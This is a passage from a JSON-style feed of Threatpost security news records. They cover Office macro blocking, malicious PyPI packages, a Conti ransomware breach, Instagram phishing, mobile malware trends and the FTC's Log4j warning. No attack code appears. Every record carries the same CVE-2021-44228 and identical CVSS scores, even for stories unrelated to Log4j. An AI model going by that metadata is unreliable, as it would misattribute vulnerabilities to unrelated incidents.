macros in files obtained from the internet,\u201d the computing giant noted. \u201cVBA macros obtained from the internet will now be blocked by default.\u201d\n\nThree popular Office apps, Word, Excel and PowerPoint, plus Access and Visio, are affected by the change.\n\n\u201cFor macros in files obtained from the internet, users will no longer be able to enable content with a click of a button,\u201d Microsoft said. \u201cThe default is more secure and is expected to keep more users safe including home users and information workers in managed organizations.\u201d\n\nStarting in late April, instead of a button to \u201cenable macros,\u201d users will be prompted with a \u201clearn more\u201d button that will take them to additional information before they can activate macros within a document.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>), \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, will focus on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-16T13:39:33", "type": "threatpost", "title": "Emotet Now Spreading Through Malicious Excel Files", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-16T13:39:33", "id": "THREATPOST:66848A3C9B8917C8F84DFDC04DD5F6D9", "href": "https://threatpost.com/emotet-spreading-malicious-excel-files/178444/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:09:26", "description": "Three malicious packages hosted in the Python Package Index (PyPI) code repository have been uncovered, which collectively have more than 12,000 downloads \u2013 and presumably slithered into installations in various applications.\n\nIndependent researcher Andrew Scott found the packages during a nearly sitewide analysis of the code contained in PyPI, which is a repository of software code created in the Python programming language. Like GitHub, npm and RubyGems, PyPI allows coders to upload software packages for use by developers in building various applications, services and other projects.\n\nUnfortunately, a single malicious package can be baked into multiple different projects \u2013 infecting them with cryptominers, info-stealers and more, and making remediation a complex process.\n\nIn this case, Scott found a malicious package containing a known trojan malware and two info-stealers.\n\nThe trojanized package is called \u201caws-login0tool,\u201d and once the package is installed, it fetches a payload executable that turns out to be a [known trojan](<https://www.virustotal.com/gui/file/79d9ecfcc143ae3216904c882a3984a90901536e6fccd223eb9bf78d943df1cd>), he said.\n\n\u201cI found this package because it was flagged in multiple text searches I did looking at setup.py, since that\u2019s one of the most common locations for malicious code in Python packages since arbitrary code can be executed there at install time,\u201d Scott explained in a [Sunday posting](<https://medium.com/ochrona/3-new-malicious-packages-found-on-pypi-a6bbb14b5e2>). \u201cSpecifically I found this by looking for import urllib.request since this is commonly used to exfiltrate data or download malicious files and it was also triggered by `from subprocess import Popen` which is somewhat suspicious because most packages don\u2019t need to execute arbitrary command line code.\u201d\n\nScott also identified two other malicious packages by looking at the import urllib.request string, both of which are built for data exfiltration.\n\nNamed \u201cdpp-client\u201d and \u201cdpp-client1234I,\u201d the two were uploaded by the same user in February. During installation, they collect details on the environment and file listings, and appear to \u201cbe looking specifically for files related to Apache Mesos,\u201d Scott said, which is an open-source project to manage computer clusters. Once the information is gathered, it\u2019s sent off to an unknown web service, according to the researcher.\n\nThe Python security team removed the identified packages once notified on Dec. 10, but all three packages live on thanks to the projects that imported them prior to the removal.\n\nScott said that the trojan package was first added to PyPI on Dec. 1. It was subsequently downloaded nearly 600 times. As for the data stealers, the dpp-client package has been downloaded more than 10,000 times, including 600+ downloads in the last month; dpp-client1234 has been downloaded around 1,500 times. and both packages mimicked an existing popular library with their source code URL, \u201cso anyone browsing to the package in PyPI or analyzing how popular the library was would see a large number of GitHub stars and forks \u2013 indicating a good reputation.\u201d\n\nThe software-supply chain has become an increasingly popular method of distributing malware. Last week, for instance, a series of malicious packages in the Node.js package manager (npm) code repository that looked to harvest Discord tokens [was found.](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>) The packages can be used to take over unsuspecting users\u2019 accounts and servers.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This [LIVE, interactive Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T18:46:34", "type": "threatpost", "title": "Malicious PyPI Code Packages Rack Up Thousands of Downloads", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T18:46:34", "id": "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "href": "https://threatpost.com/malicious-pypi-code-packages/176971/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-22T22:00:14", "description": "Meyer Corp., maker of Farberware and the largest cookware and bakeware distributor in the U.S., has begun notifying 2,747 employees that a cyberattack that occurred on Oct. 25 compromised their personal data.\n\nMeyer filed a notice with the state of Maine [disclosing the breach](<https://apps.web.maine.gov/online/aeviewer/ME/40/722270ba-5507-4ea4-88d7-b14961dc4c2d.shtml>), which it discovered on Dec. 1. And while the report given to the Maine Attorney General doesn\u2019t specifically name the culprit behind the attack, the Conti ransomware group had already announced on its leak site on Nov. 7 it was in possession of the employee data files, according to a report this week on the [cyberattack](<https://www.securityweek.com/cookware-distribution-giant-meyer-discloses-data-breach>).\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\nMeyer, based in Vallejo, Calif., was storing detailed information on its employees, including names, Social-Security numbers, driver\u2019s-license numbers and more, along with their name or other personal identifier. Other information which could now potentially be in the hands of the Conti ransomware operators include drug screening results, immigration information and health and medical information.\n\nThe company didn\u2019t reveal many additional details of the strike, but it\u2019s worth noting that Meyer is just one of many companies breached by Conti\u2019s prolific ransomware operations.\n\n## **Conti\u2019s Prolific Ransomware Operations**\n\n\u201cRansomware groups such as Conti have been a thorn in the side of organizations from almost all industries and around the world,\u201d Erich Kron, security awareness advocate for KnowBe4, told Threatpost. \u201cAttacks such as this one by the Conti group are typically a ransomware type of attack that first steals the data, then encrypts it and holds the decryption key ransom.\u201d\n\nBut even if the company pays the demanded ransom, its employees, partners and customers remain vulnerable to subsequent shakedowns.\n\n\u201cIn addition, the groups generally threaten the victim organization with exposure of the stolen data, which can include customers, employees, financial information or intellectual property, among other things, if they do not pay,\u201d Kron said.\n\nJust this month, KP Snacks, a U.K.-based food giant, was [hit by Conti ransomware](<https://threatpost.com/kp-snacks-crumbs-ransomware-attack/178176/>), causing delays in deliveries across the country.\n\n## **Keeping Conti Out of Your Cloud**\n\nKeeping such sensitive data stored in the cloud is a common practice, but leaves companies vulnerable to attack if not properly secured, Amit Shaked, CEO of Laminar, explained in response to the Meyer breach.\n\n\u201cData is no longer a commodity, it\u2019s a currency \u2014 as this incident represents. Information within an organization\u2019s network is valuable to both businesses and attackers,\u201d Shaked said via email. \u201cThis incident also reminds us that with a majority of the world\u2019s data residing in the cloud, it is imperative that security becomes data-centric and solutions become cloud-native.\u201d\n\nFull integration with the cloud is also critical, Shaked added.\n\n\u201cSolutions need to be completely integrated with the cloud in order to identify potential risks and have a deeper understanding of where the data reside,\u201d he said. \u201cUsing the dual approach of visibility and protection, data protection teams can know for certain which data stores are valuable targets and ensure proper controls, which allows for quicker discovery of any data leakage.\u201d\n\nKeeping ahead of sophisticated groups like Conti [ransomware operators](<https://threatpost.com/lockbit-blackcat-swissport-ransomware-activity/178261/>) requires a clear, risk-based approach, Aaron Sandeen, CEO and co-founder, Cyber Security Works added.\n\n\u201cIdeally, organizations should seek out near real-time vulnerability platforms that can centralize threat data and identify, investigate and rank vulnerabilities based on weaponization \u2013 a more effective approach than waiting for reports to be formalized, interpreted and delegated,\u201d advised Sandeen.\n\nBut beyond technical solutions, Kron added strong security training for employees will also help keep cyberattackers, like Conti, at bay.\n\nBecause groups such as Conti and other bad actors use email phishing as a top method of gaining initial network access, it has never been more critical to foster a strong, good, security culture through security awareness training and regular simulated attacks.\u201d\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a _**[_LIVE roundtable discussion_](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)**_, \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, will focus on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. _**[_REGISTER NOW_](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>)**_ and please Tweet us your questions ahead of time @Threatpost so they can be_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-22T20:41:48", "type": "threatpost", "title": "Cyberattackers Cook Up Employee Personal Data Heist for Meyer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-22T20:41:48", "id": "THREATPOST:AE9B4708A7A9B6F3A24C35E15C6150A4", "href": "https://threatpost.com/cyberattackers-employee-personal-data-meyer/178570/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T14:21:33", "description": "A phishing campaign used the guise of Instagram technical support to steal login credentials from employees of a prominent U.S. life insurance company headquartered in New York, researchers have revealed.\n\nAccording to a [report](<https://www.armorblox.com/blog/the-email-bait-and-phish-instagram-phishing-attack>) published by Armorblox on Wednesday, the attack combined brand impersonation with social engineering and managed to bypass Google\u2019s email security by using a valid domain name, eventually reaching the mailboxes of hundreds of employees.\n\n## Scam Looked Identical to Instagram\n\nThe attack began with a simple email. Disguised as an alert from Instagram\u2019s technical support team, it indicated that the recipient\u2019s account was under threat of deactivation. The intention, according to the report, was \u201cto create a sense of urgency while instilling trust in the sender.\u201d\n\n\u201cYou have been reported for sharing fake content in your membership,\u201d read the body of the email. \u201cYou must verify your membership. If you can\u2019t verify within 24 hours your membership will be permanently deleted from our servers.\u201d This message fostered a sense of urgency, to goad the unsuspecting into clicking on a malicious \u201caccount verify\u201d link. Targets who did so ended up on a landing page, where they were asked to submit their Instagram account login information. That information would go straight to the malicious actor, of course, unbeknownst to the target themselves.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/16092345/instagram-phishing-email-e1647437038569.png>)\n\nInstagram phishing email. Source: Armorblox.\n\nAt no point did any of these steps \u201clook to be malicious to the common end user, and every touch point, from the email to the account verification form, include Meta and Instagram branding and logos,\u201d the researchers noted.\n\nThe attackers certainly left clues along the way. They made grammar, spelling and capitalization errors in the body of the phishing email. In the sender field, the \u201cI\u201d in \u201cInstagram Support\u201d was, in fact, an \u201cL.\u201d And the email domain itself \u2013 membershipform@outlook.com.tr \u2013 clearly didn\u2019t come from Instagram.\n\nStill, the domain itself was perfectly legitimate \u2013 allowing it to bypass traditional spam filters \u2013 and, the researchers explained, \u201cthe sender crafted a long email address, meaning that many mobile users would only see the characters before the \u2018@\u2019 sign, which in this case is \u2018membershipform\u2019 \u2013 one that would not raise suspicion.\u201d\n\n## How to Defend Yourself\n\nJust a few weeks ago, cyberattackers [impersonated](<https://threatpost.com/cyberattackers-docusign-steal-microsoft-outlook-logins/178613/>) the DocuSign e-signature software to steal Microsoft account credentials from a U.S. payment solutions company. In that case, too, hundreds of employees were exposed as a result of dutiful brand impersonation, clever social engineering and a valid email domain that bypassed traditional security measures.\n\nPerhaps these two campaigns were identified and stopped, but what about the next one? Or the one after that? Or other campaigns we haven\u2019t heard about, because they weren\u2019t successfully identified by a security team?\n\nArmorblox\u2019s report suggested four main areas where employees can focus to protect themselves against phishing.****\n\n * **Avoid opening emails that you are not expecting**\n * **Augment native email security to stop socially engineered attacks**\n * **Watch out for targeted attacks**\n * **Follow multi-factor authentication and password management best practices**\n\n\u201cTo protect against these attacks, employees should be educated on the value of their email accounts,\u201d wrote Erich Kron of KnowBe4, via email. \u201cIn addition, employees need to understand the danger of reusing passwords and using simple passwords to secure accounts both personally and within the organization.\u201d\n\nEven one employee\u2019s slip-up can cause major problems across an organization, followed by other organizations along a supply chain. \u201cTake caution when using business credentials to login across multiple apps,\u201d wrote Armorblox researchers, \u201cespecially social apps that cross over into personal use. The convenience may be tempting; however, it only takes one time for both your sensitive personal and business data to risk exposure.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-16T04:00:47", "type": "threatpost", "title": "Phony Instagram \u2018Support Staff\u2019 Emails Hit Insurance Company", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-16T04:00:47", "id": "THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "href": "https://threatpost.com/phony-instagram-support-staff-emails-hit-insurance-company/178929/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-22T21:23:04", "description": "The number of cyberattacks launched against mobile users was down last year, researchers have found \u2014 but don\u2019t pop the champagne just yet. The decline was offset by jacked-up, more sophisticated, more nimble mobile nastiness.\n\nIn a Monday [report](<https://securelist.com/mobile-malware-evolution-2021/105876/>), Kaspersky said that its researchers have observed a downward trend in the number of attacks on mobile users, as shown in the chart below. However, \u201cattacks are becoming more sophisticated in terms of both malware functionality and vectors,\u201d according to Kaspersky experts Tatyana Shiskova and Anton Kivva.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/22151706/downware-mobile-malware-trend-e1645561041683.png>)\n\nNumber of attacks on mobile users, 2019\u20132021. Source: Kaspersky.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\n\u201cIn the reporting period, after a surge in H2 2020, cybercriminal activity gradually abated: There were no global newsbreaks or major campaigns, and the COVID-19 topic began to fade,\u201d according to Monday\u2019s report. \u201cAt the same time, new players continue to emerge on the cyberthreat market as malware becomes more sophisticated; thus, the fall in the overall number of attacks is \u2018compensated\u2019 by the greater impact of a successful attack. Most dangerous of all in this regard are [banking malware](<https://threatpost.com/xenomorph-malware-google-play-facehugger/178563/>) and [spyware](<https://threatpost.com/new-android-spyware-poses-pegasus-like-threat/176155/>).\u201d\n\nThe company\u2019s mobile products and technologies detected 97,661 new mobile banking trojans, along with 3,464,756 malicious installation packages and 17,372 new mobile ransomware trojans.\n\nThe number of malicious installation packages observed in 2021 actually dropped substantially, down 2,218,938 from 2020 and slightly down from the 3,503,952 packages discovered in 2019.\n\n## New Tricks for Mobile Banking Malware\n\nLast year, banking trojans learned a number of new tricks. For example, the Fakecalls banker, which targets Korean mobile users, is now \u201c[dropping] outgoing calls to the victim\u2019s bank and plays pre-recorded operator responses stored in the trojan\u2019s body,\u201d according to the report.\n\nOther old dogs learning new tricks include the Sova banker, which steals[ cookies](<https://encyclopedia.kaspersky.com/glossary/cookie/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), \u201cenabling attackers to access the user\u2019s current session and personal mobile banking account without knowing the login credentials.\u201d\n\nIn 2021, cybercriminals also went after mobile gaming credentials \u2013 which are often sold later on the darknet or used to steal in-game goods from users. Last year, for example, marked the first time that researchers spotted what they called a[ \u201cGamethief-type mobile trojan](<https://securelist.com/it-threat-evolution-q1-2021-mobile-statistics/102547/#quarterly-highlights>),\u201d aimed at stealing account credentials for the mobile version of PlayerUnknown\u2019s Battlegrounds (PUBG).\n\nAs well, the Vultur backdoor \u2013 found packed into a malicious, fully functional two-factor authentication (2FA) app discovered last month on Google Play \u2013 picked up the capability of using Virtual Network Computing (VNC) to snoop on targets by recording smartphone screens: \u201cWhen the user opens an app that is of interest to attackers, they can monitor the on-screen events,\u201d researchers said.\n\nOther trends spotted in 2021: fewer pandemic/COVID-19 topics used as bait, and more pop-culture lures, such as Squid Game. Kaspersky pointed to the [Joker trojan](<https://threatpost.com/updated-joker-malware-android-apps/167776/>) on Google Play, which was found masquerading \u201cas an app with a background wallpaper in the style of Squid Game.\u201d\n\n## Google Play Still Infested\n\nSpeaking of the malware-ridden Play Store, regardless of Google\u2019s attempts to scrub its app store clean, it\u2019s still a bit of a roach motel. ThreatFabric researchers recently sniffed out 300,000 banking trojan [infections](<https://threatpost.com/banking-trojan-infections-google-play/176630/>) in Google Play during a four-month period.\n\nKaspersky also called out what it said were \u201crepeat incidents of malicious code injection into popular apps through advertising SDKs,\u201d as in the \u201csensational\u201d case of [CamScanner](<https://threatpost.com/malicious-app-tallies-100-million-downloads/147748/>): a malicious app spotted in the Google Play store in August 2019 that tallied 100 million downloads.\n\nResearchers noted that they also found [malicious code](<https://threatpost.com/sophisticated-android-spyware-google-play/155202/>) inside ad libraries in [the official client](<https://securelist.com/apkpure-android-app-store-infected/101845/>) for the third-party marketplace known as APKpure, as well as in a [modified WhatsApp build](<https://threatpost.com/custom-whatsapp-build-malware/168892/>).\n\nOne example was particularly alarming, from a security hygiene perspective: the malicious, fully functional 2FA app that hung out in Google Play for [more than two weeks](<https://threatpost.com/2fa-app-banking-trojan-google-play/178077/>), managing to cling to 10,000 downloads. It came loaded with the Vultur stealer malware that targets and swoops down on financial data.\n\nAmong all of last year\u2019s many banking-trojans moves, researchers found the resurgence of Joker especially notable. The [malware](<https://threatpost.com/malicious-joker-app-downloads-google-play/177139/>), which zaps victims with premium SMS charges, popped up yet again on Google Play, in a mobile app called Color Message, after which it snuck into more than a half-million downloads before the store collared it.\n\nKaspersky researchers also called out the [Facestealer](<https://blog.malwarebytes.com/detections/android-trojan-spy-facestealer/>) trojan: a family of Android trojans that uses social engineering to rip off victims\u2019 Facebook credentials.\n\nThese trojans most commonly sneak into Google Play by masquerading as a legitimate app, such as a photo editor or VPN service, to which they add a small code snippet to decrypt and launch their payload, the researchers explained. To confound analysis, such malware often uses a command-and-control (C2) server to send unpacking commands that get carried out in multiple steps: \u201cEach decrypted module contains the address of the next one, plus instructions for decrypting it,\u201d they said.\n\n## Most of It\u2019s Still Adware\n\nAt 42 percent, adware was yet again the biggest slice of the mobile malware pie, even though it fell 14.83 percentage points over the prior year. In 2020, adware was also the No. 1 mobile menace, at 57 percent.\n\nNext in prevalence were potentially unwanted riskware apps at 35 percent: a share increase of 14 percentage points, after a sharp decline in 2019\u20132020. As [defined](<https://usa.kaspersky.com/resource-center/threats/riskware>) by Kaspersky, riskware are legitimate programs \u201cthat pose potential risks due to security vulnerability, software incompatibility or legal violations.\u201d\n\nIn third place were trojan threats at 9 percent: a share that rose by 4 percentage points year-over-year.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-22T21:00:36", "type": "threatpost", "title": "Gaming, Banking Trojans Dominate Mobile Malware Scene", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-22T21:00:36", "id": "THREATPOST:CEEE25A4A4491980FA1ECB491795DBA9", "href": "https://threatpost.com/gaming-banking-trojans-mobile-malware/178571/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T19:44:48", "description": "The Federal Trade Commission (FTC) will muster its legal muscle to pursue companies and vendors that fail to protect consumer data [from the risks of](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>) the Log4j vulnerabilities, it [warned](<https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability>) on Tuesday.\n\n\u201cThe FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future,\u201d according to the warning.\n\nThose companies that bungle consumer data, leaving vulnerabilities unpatched and thus opening the door to exploits and the resulting possible \u201closs or breach of personal information, financial loss and other irreversible harms,\u201d are risking consequences tied to weighty laws that have resulted in fat fines, the FTC said.\n\nIt mentioned, among others, the [Federal Trade Commission Act ](<https://www.ftc.gov/enforcement/statutes/federal-trade-commission-act>) and the [Gramm-Leach-Bliley Act](<https://threatpost.com/privacy-regulation-could-be-a-test-for-states-rights/138303/>). The FTC Act, the commission\u2019s primary statute, enables it to seek monetary redress and other relief for conduct injurious to consumers. [Gramm-Leach-Bliley](<https://www.ftc.gov/tips-advice/business-center/privacy-and-security/gramm-leach-bliley-act>) requires financial institutions to safeguard sensitive data.\n\n\u201c It is critical that companies and their vendors relying on Log4j act now, in order to reduce the likelihood of harm to consumers, and to avoid FTC legal action,\u201d the FTC urged.\n\nThe FTC means it: Its warning included a reference to the complaints against Equifax, which agreed to pay $700 million to settle actions by the FTC, the Consumer Financial Protection Bureau, and all fifty states over its infamous [2017 data leak](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (consumers\u2019 reaction at the time: [Make it hurt more](<https://threatpost.com/200k-sign-petition-against-equifax-data-breach-settlement/148560/>)).\n\nAccording to the Equifax complaint, its failure to patch a known vulnerability \u201cirreversibly exposed the personal information of 147 million consumers.\u201d Expect more of the same if your company fails to protect consumer data from exposure as a result of Log4Shell or whatever similar, known vulnerabilities crop up, it said.\n\nThe FTC advised companies to use [guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) from the Cybersecurity and Infrastructure Security Agency (CISA) to check if they\u2019re using Apache\u2019s Log4j logging library, which is at the heart of the cluster of vulnerabilities known as [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>).\n\nCompanies that find that they are using Log4j should do the following, CISA recommended:\n\n * Update your Log4j software package to the [most current version](<https://logging.apache.org/log4j/2.x/security.html>).\n * Consult [CISA guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) to mitigate this vulnerability.\n * Ensure remedial steps are taken to ensure that your company\u2019s practices do not violate the law. Failure to identify and patch instances of this software may violate [the FTC Act](<https://www.ftc.gov/enforcement/statutes/federal-trade-commission-act>).\n * Distribute this information to any relevant third-party subsidiaries that sell products or services to consumers who may be vulnerable.\n\nOn Dec. 17, CISA issued an [emergency directive](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache>) mandating federal civilian departments and agencies to immediately patch their internet-facing systems for the Log4j vulnerabilities by Thursday, Dec. 23. Federal agencies were given five more days \u2013 until Dec. 28 \u2013 to report Log4Shell-affected products, including vendor and app names and versions, along with what actions have been taken \u2013 e.g. updated, mitigated, removed from agency network \u2013 to block exploitation attempts.\n\nCISA provides a [dedicated page](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) for the Log4Shell flaws with patching information and has released a [Log4j scanner](<https://twitter.com/cisagov/status/1473401212468932609?s=12>) to hunt down potentially vulnerable web services.\n\n## The Log4j Fire Rages Unabated\n\nThe initial flaw \u2013 [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) \u2013 was discovered on Dec. 9 and came under attack within hours. As of Dec. 15, more than 1.8 million attacks, against [half of all corporate networks](<https://threatpost.com/log4j-attacks-state-actors-worm/177088/>), using at least 70 distinct malware families, had already been launched to exploit what became a trio of bugs:\n\n 1. The Log4Shell remote-code execution (RCE) 